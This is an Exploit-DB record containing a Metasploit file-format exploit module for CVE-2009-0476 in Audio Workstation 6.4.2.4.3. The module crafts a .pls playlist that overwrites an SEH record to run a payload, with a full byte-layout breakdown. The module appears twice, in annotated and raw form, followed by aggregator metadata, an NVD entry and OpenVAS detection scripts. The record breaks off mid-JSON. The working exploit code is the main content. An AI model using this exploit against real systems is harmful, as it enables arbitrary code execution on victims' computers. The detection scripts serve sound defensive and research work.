ID EDB-ID:16661 Type exploitdb Reporter metasploit Modified 2010-09-25T00:00:00
Description
Audio Workstation 6.4.2.4.3 .pls Buffer Overflow (SEH overwrite). CVE-2009-0476. Local, file-format exploit for the Windows platform: the module only writes a crafted playlist, which the victim must open in Audio Workstation for the payload to run.
##
# $Id: audio_wkstn_pls.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# File-format exploit for Audio Workstation 6.4.2.4.3.
#
# The module writes a .pls playlist whose oversized contents overwrite a
# structured exception handler record. The handler slot is pointed at a
# pop/pop/ret sequence in bass.dll (see the target below), which is why a
# single "Windows Universal" target is listed: the address lives in an
# application-shipped DLL rather than a system one. NOTE(review): that
# address is only valid for the bass.dll build bundled with 6.4.2.4.3 —
# verify against the installed copy before relying on it.
#
# Nothing is sent over the network. The payload handler is disabled by
# default and the victim has to open the generated file themselves.
class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.
        When opening a malicious pls file with the Audio Workstation,
        a remote attacker could overflow a buffer and execute
        arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'germaya_x', 'dookie', ],
      'Version'        => '$Revision: 10477 $',
      'References'     =>
        [
          [ 'CVE', '2009-0476' ],
          [ 'OSVDB', '55424' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/10353' ],
        ],
      'DefaultOptions' =>
        {
          # The payload runs inside an exception handler, so let it
          # unwind via the SEH exit technique rather than a clean exit.
          'EXITFUNC'              => 'seh',
          # Only a file is produced here; no listener is started.
          'DisablePayloadHandler' => 'true',
        },
      'Payload'        =>
        {
          # 4100 bytes is well under the 4652-byte region that follows the
          # SEH record, so the padding arithmetic in #exploit never goes
          # negative.
          'Space'           => 4100,
          'BadChars'        => "\x00",
          'StackAdjustment' => -3500,
          # The encoder is limited to uppercase alphanumerics and the
          # filler is uppercase alpha too. Only NUL is declared bad, so
          # this restriction presumably reflects how the player handles
          # the playlist text — TODO confirm against the parser.
          'EncoderType'     => Msf::Encoder::Type::AlphanumUpper,
          # #exploit supplies its own 32-byte sled; no framework padding.
          'DisableNops'     => 'True',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Dec 08 2009',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),
      ], self.class)
  end

  # Builds the malicious playlist and writes it out via the FILEFORMAT
  # mixin. Byte layout of the generated file (offsets from the start):
  #
  #   0    .. 1307   uppercase-alpha filler up to the SEH record
  #   1308 .. 1311   nSEH: "\xeb\x16" (jmp short +0x16) plus two nops
  #   1312 .. 1315   SEH handler: target.ret, little-endian
  #   1316 .. 1347   32-byte nop sled
  #   1348 ..        encoded payload, then filler
  #
  # A pop/pop/ret handler returns into the nSEH field; the short jump
  # there lands 16 bytes into the sled, which slides into the payload.
  # Everything after the SEH record is padded to 4652 bytes, so the
  # file is always 6000 bytes long regardless of the payload chosen.
  def exploit
    # Fetch the encoded payload once; its length drives the tail padding.
    shellcode = payload.encoded

    buf = rand_text_alpha_upper(1308)
    buf << "\xeb\x16\x90\x90"              # nSEH: hop over the handler slot
    buf << [target.ret].pack('V')          # SEH: pop/pop/ret in bass.dll
    buf << make_nops(32)                   # landing zone for the jump
    buf << shellcode
    buf << rand_text_alpha_upper(4652 - shellcode.length)

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(buf)
  end
end
{"id": "EDB-ID:16661", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Audio Workstation 6.4.2.4.3 pls Buffer Overflow", "description": "Audio Workstation 6.4.2.4.3 pls Buffer Overflow. CVE-2009-0476. Local exploit for windows platform", "published": "2010-09-25T00:00:00", "modified": "2010-09-25T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16661/", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2009-0476"], "lastseen": "2016-02-02T06:12:35", "viewCount": 2, "enchantments": {"score": {"value": 8.7, "vector": "NONE", "modified": "2016-02-02T06:12:35", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-0476"]}, {"type": "exploitdb", "idList": ["EDB-ID:7974", "EDB-ID:7973", "EDB-ID:7958", "EDB-ID:15013", "EDB-ID:10353", "EDB-ID:16626", "EDB-ID:11079"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/AUDIO_WKSTN_PLS", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/AUDIOTRAN_PLS"]}, {"type": "openvas", "idList": ["OPENVAS:900459", "OPENVAS:900458", "OPENVAS:1361412562310900459", "OPENVAS:1361412562310900458"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:84553", "PACKETSTORM:85991"]}], "modified": "2016-02-02T06:12:35", "rev": 2}, "vulnersScore": 8.7}, "sourceHref": "https://www.exploit-db.com/download/16661/", "sourceData": "##\r\n# $Id: audio_wkstn_pls.rb 10477 2010-09-25 11:59:02Z mc $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.\r\n\t\t\t\tWhen opening a malicious pls file with the Audio Workstation,\r\n\t\t\t\ta remote attacker could overflow a buffer and execute\r\n\t\t\t\tarbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'germaya_x', 'dookie', ],\r\n\t\t\t'Version' => '$Revision: 10477 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-0476' ],\r\n\t\t\t\t\t[ 'OSVDB', '55424' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.exploit-db.com/exploits/10353' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'seh',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 4100,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t\t'EncoderType' => Msf::Encoder::Type::AlphanumUpper,\r\n\t\t\t\t\t'DisableNops' => 'True',\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Dec 08 2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tsploit = rand_text_alpha_upper(1308)\r\n\t\tsploit << 
\"\\xeb\\x16\\x90\\x90\"\r\n\t\tsploit << [target.ret].pack('V')\r\n\t\tsploit << make_nops(32)\r\n\t\tsploit << payload.encoded\r\n\t\tsploit << rand_text_alpha_upper(4652 - payload.encoded.length)\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\t\tfile_create(sploit)\r\n\r\n\tend\r\n\r\nend\r\n", "osvdbidlist": ["55424"]}
{"cve": [{"lastseen": "2020-10-03T11:54:11", "description": "Stack-based buffer overflow in MultiMedia Soft AdjMmsEng.dll 7.11.1.0 and 7.11.2.7, as distributed in multiple MultiMedia Soft audio components for .NET, allows remote attackers to execute arbitrary code via a long string in a playlist (.pls) file, as originally reported for Euphonics Audio Player 1.0. NOTE: some of these details are obtained from third party information.", "edition": 3, "cvss3": {}, "published": "2009-02-08T21:30:00", "title": "CVE-2009-0476", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0476"], "modified": "2018-10-11T21:01:00", "cpe": ["cpe:/a:multimediasoft:audio_sound_editer_for_.net:-", "cpe:/a:multimediasoft:audio_sound_suite_for_.net:-", "cpe:/a:multimediasoft:audio_dj_studio_for_.net:-", "cpe:/a:multimediasoft:audio_sound_recorder_for_.net:-", "cpe:/a:multimediasoft:audio_sound_studio_for_.net:-"], "id": "CVE-2009-0476", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0476", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:multimediasoft:audio_sound_recorder_for_.net:-:*:*:*:*:*:*:*", "cpe:2.3:a:multimediasoft:audio_sound_suite_for_.net:-:*:*:*:*:*:*:*", "cpe:2.3:a:multimediasoft:audio_sound_studio_for_.net:-:*:*:*:*:*:*:*", "cpe:2.3:a:multimediasoft:audio_sound_editer_for_.net:-:*:*:*:*:*:*:*", "cpe:2.3:a:multimediasoft:audio_dj_studio_for_.net:-:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-02T21:13:47", 
"bulletinFamily": "scanner", "cvelist": ["CVE-2009-0476"], "description": "This host is running MultiMedia Soft Audio Products and is prone\n to Buffer Overflow Vulnerability.", "modified": "2017-02-20T00:00:00", "published": "2009-02-20T00:00:00", "id": "OPENVAS:900458", "href": "http://plugins.openvas.org/nasl.php?oid=900458", "type": "openvas", "title": "MultiMedia Soft Audio Products Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_multimedia_audio_prdts_bof_vuln.nasl 5369 2017-02-20 14:48:07Z cfi $\n#\n# MultiMedia Soft Audio Products Buffer Overflow Vulnerability\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the attacker execute arbitrary codes in the\n context of the application through crafted playlist files 'file.pls' with\n overly long data which may lead to crashing of the application.\n\n Impact level: Application/System\";\n\ntag_affected = \"Following components with AdjMmsEng.dll file version 7.11.2.7 and prior.\n MultiMedia Soft Audio DJ Studio for .NET\n MultiMedia Soft Audio Sound Recorder for .NET\n MultiMedia Soft Audio Sound Editor for .NET\";\ntag_insight = \"The vulnerability exists in AdjMmsEng.dll file of multiple MultiMedia Soft\n audio components for .NET. This issue arises due to failure in performing\n adequate boundary checks on user supplied input to the application buffer.\";\ntag_solution = \"Upgrade to the latest versions\n http://www.multimediasoft.com\";\ntag_summary = \"This host is running MultiMedia Soft Audio Products and is prone\n to Buffer Overflow Vulnerability.\";\n\nif(description)\n{\n script_id(900458);\n script_version(\"$Revision: 5369 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 15:48:07 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-20 17:40:17 +0100 (Fri, 20 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_bugtraq_id(33589);\n script_cve_id(\"CVE-2009-0476\");\n script_name(\"MultiMedia Soft Audio Products Buffer Overflow Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/33791\");\n script_xref(name : \"URL\" , value : 
\"http://www.milw0rm.com/exploits/7973\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"impact\" , value : tag_impact);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\.NETFramework\\AssemblyFolders\\\";\nif(!registry_key_exists(key:key))exit(0);\n\nforeach item(registry_enum_keys(key:key))\n{\n if(item =~ \"(MMS.AudioDjStudio|MMS.AudioSoundEditor|MMS.AudioSoundRecorder)\")\n {\n djPath = registry_get_sz(key:key + item, item:\"InstPath\");\n share = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:djPath);\n file = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\", string:djPath +\n \"\\Redist\\AdjMmsEng.dll\");\n version = GetVer(file:file, share:share);\n if(version != NULL)\n {\n # Grep for 'AdjMmsEng.dll' version less or equal to 7.11.2.7\n if(version_is_less_equal(version:version, test_version:\"7.11.2.7\"))\n {\n security_message(0);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0476"], "description": "This host is running Euphonics Audio Player and is prone to Buffer\n Overflow Vulnerability.", "modified": "2017-02-20T00:00:00", "published": "2009-02-20T00:00:00", "id": "OPENVAS:900459", "href": 
"http://plugins.openvas.org/nasl.php?oid=900459", "type": "openvas", "title": "Euphonics Audio Player Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_euphonics_player_bof_vuln.nasl 5369 2017-02-20 14:48:07Z cfi $\n#\n# Euphonics Audio Player Buffer Overflow Vulnerability\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the attacker execute arbitrary codes in the\n context of the application through crafted playlist files 'file.pls' with\n overly long data which may lead to crashing of the application.\n\n Impact level: Application/System\";\n\ntag_affected = \"Euphonics Audio Player with AdjMmsEng.dll file version 7.11.2.7 and prior.\";\ntag_insight = \"The vulnerability exists in AdjMmsEng.dll file of multiple MultiMedia Soft\n audio components for .NET. 
This flaw arises due to failure in performing\n adequate boundary checks on user supplied input to the application buffer.\";\ntag_solution = \"Upgrade to the latest version\n http://sourceforge.net/projects/euphonics\";\ntag_summary = \"This host is running Euphonics Audio Player and is prone to Buffer\n Overflow Vulnerability.\";\n\nif(description)\n{\n script_id(900459);\n script_version(\"$Revision: 5369 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 15:48:07 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-20 17:40:17 +0100 (Fri, 20 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_bugtraq_id(33589);\n script_cve_id(\"CVE-2009-0476\");\n script_name(\"Euphonics Audio Player Buffer Overflow Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/Advisories/33817\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/33791\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/7958\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/7973\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/7974\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2009/0316\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"impact\" , value : tag_impact);\n 
exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\";\n\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nkey2 = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\\";\n\nforeach item (registry_enum_keys(key:key))\n{\n value = registry_get_sz(key:key + item, item:\"DisplayName\");\n if(\"Euphonics\" >< value)\n {\n progDir = registry_get_sz(key:key2, item:\"ProgramFilesDir\");\n phonicsPath = progDir + \"\\Euphonics\\AdjMmsEng.dll\";\n break;\n }\n}\n\nif(!progDir){\n exit(0);\n}\n\nshare = ereg_replace(pattern:\"([A-Z]):.*\",replace:\"\\1$\",string:phonicsPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\",replace:\"\\1\",string:phonicsPath);\n\nversion = GetVer(file:file, share:share);\nif(version == NULL){\n exit(0);\n}\n# Grep for 'AdjMmsEng.dll' version less or equal to 7.11.2.7\nif(version_is_less_equal(version:version, test_version:\"7.11.2.7\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-29T22:26:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0476"], "description": "This host is running MultiMedia Soft Audio Products and is prone\n to Buffer Overflow Vulnerability.", "modified": "2020-04-27T00:00:00", "published": "2009-02-20T00:00:00", "id": "OPENVAS:1361412562310900458", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900458", "type": "openvas", "title": "MultiMedia Soft Audio Products Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# MultiMedia Soft Audio Products Buffer Overflow Vulnerability\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 SecPod, http://www.secpod.com\n#\n# This program 
is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900458\");\n script_version(\"2020-04-27T09:00:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 09:00:11 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-02-20 17:40:17 +0100 (Fri, 20 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_bugtraq_id(33589);\n script_cve_id(\"CVE-2009-0476\");\n script_name(\"MultiMedia Soft Audio Products Buffer Overflow Vulnerability\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/33791\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/7973\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n script_tag(name:\"affected\", value:\"The following components with AdjMmsEng.dll file version 7.11.2.7 and prior.\n\n MultiMedia Soft Audio DJ Studio for .NET\n\n MultiMedia Soft Audio Sound 
Recorder for .NET\n\n MultiMedia Soft Audio Sound Editor for .NET\");\n\n script_tag(name:\"insight\", value:\"The vulnerability exists in AdjMmsEng.dll file of multiple MultiMedia Soft\n audio components for .NET. This issue arises due to failure in performing\n adequate boundary checks on user supplied input to the application buffer.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the latest versions.\");\n\n script_tag(name:\"summary\", value:\"This host is running MultiMedia Soft Audio Products and is prone\n to Buffer Overflow Vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the attacker execute arbitrary codes in the\n context of the application through crafted playlist files 'file.pls' with\n overly long data which may lead to crashing of the application.\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\.NETFramework\\AssemblyFolders\\\";\nif(!registry_key_exists(key:key))exit(0);\n\nforeach item(registry_enum_keys(key:key))\n{\n if(item =~ \"(MMS.AudioDjStudio|MMS.AudioSoundEditor|MMS.AudioSoundRecorder)\")\n {\n djPath = registry_get_sz(key:key + item, item:\"InstPath\");\n share = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:djPath);\n file = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\", string:djPath +\n \"\\Redist\\AdjMmsEng.dll\");\n version = GetVer(file:file, share:share);\n if(version != NULL)\n {\n if(version_is_less_equal(version:version, test_version:\"7.11.2.7\"))\n {\n report = report_fixed_ver(installed_version:version, vulnerable_range:\"Less than or equal to 7.11.2.7\", install_path:djPath);\n security_message(port: 0, data: report);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2020-04-29T22:26:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0476"], "description": "This host is running Euphonics Audio Player and is prone to Buffer\n Overflow Vulnerability.", "modified": "2020-04-27T00:00:00", "published": "2009-02-20T00:00:00", "id": "OPENVAS:1361412562310900459", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900459", "type": "openvas", "title": "Euphonics Audio Player Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Euphonics Audio Player Buffer Overflow Vulnerability\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900459\");\n script_version(\"2020-04-27T09:00:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 09:00:11 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-02-20 17:40:17 +0100 (Fri, 20 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_bugtraq_id(33589);\n script_cve_id(\"CVE-2009-0476\");\n script_name(\"Euphonics Audio Player Buffer Overflow Vulnerability\");\n script_xref(name:\"URL\", value:\"http://secunia.com/Advisories/33817\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/33791\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/7958\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/7973\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/7974\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/0316\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n script_tag(name:\"affected\", value:\"Euphonics Audio Player with AdjMmsEng.dll file version 7.11.2.7 and prior.\");\n\n script_tag(name:\"insight\", value:\"The vulnerability exists in AdjMmsEng.dll file of multiple MultiMedia Soft\n audio components for .NET. 
This flaw arises due to failure in performing\n adequate boundary checks on user supplied input to the application buffer.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the latest version.\");\n\n script_tag(name:\"summary\", value:\"This host is running Euphonics Audio Player and is prone to Buffer\n Overflow Vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the attacker execute arbitrary codes in the\n context of the application through crafted playlist files 'file.pls' with\n overly long data which may lead to crashing of the application.\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\";\n\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nkey2 = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\\";\n\nforeach item (registry_enum_keys(key:key))\n{\n value = registry_get_sz(key:key + item, item:\"DisplayName\");\n if(\"Euphonics\" >< value)\n {\n progDir = registry_get_sz(key:key2, item:\"ProgramFilesDir\");\n phonicsPath = progDir + \"\\Euphonics\\AdjMmsEng.dll\";\n break;\n }\n}\n\nif(!progDir){\n exit(0);\n}\n\nshare = ereg_replace(pattern:\"([A-Z]):.*\",replace:\"\\1$\",string:phonicsPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\",replace:\"\\1\",string:phonicsPath);\n\nversion = GetVer(file:file, share:share);\nif(version == NULL){\n exit(0);\n}\nif(version_is_less_equal(version:version, test_version:\"7.11.2.7\")){\n report = report_fixed_ver(installed_version:version, vulnerable_range:\"Less than or equal to 7.11.2.7\", install_path:phonicsPath);\n security_message(port: 0, data: report);\n}\n", "cvss": 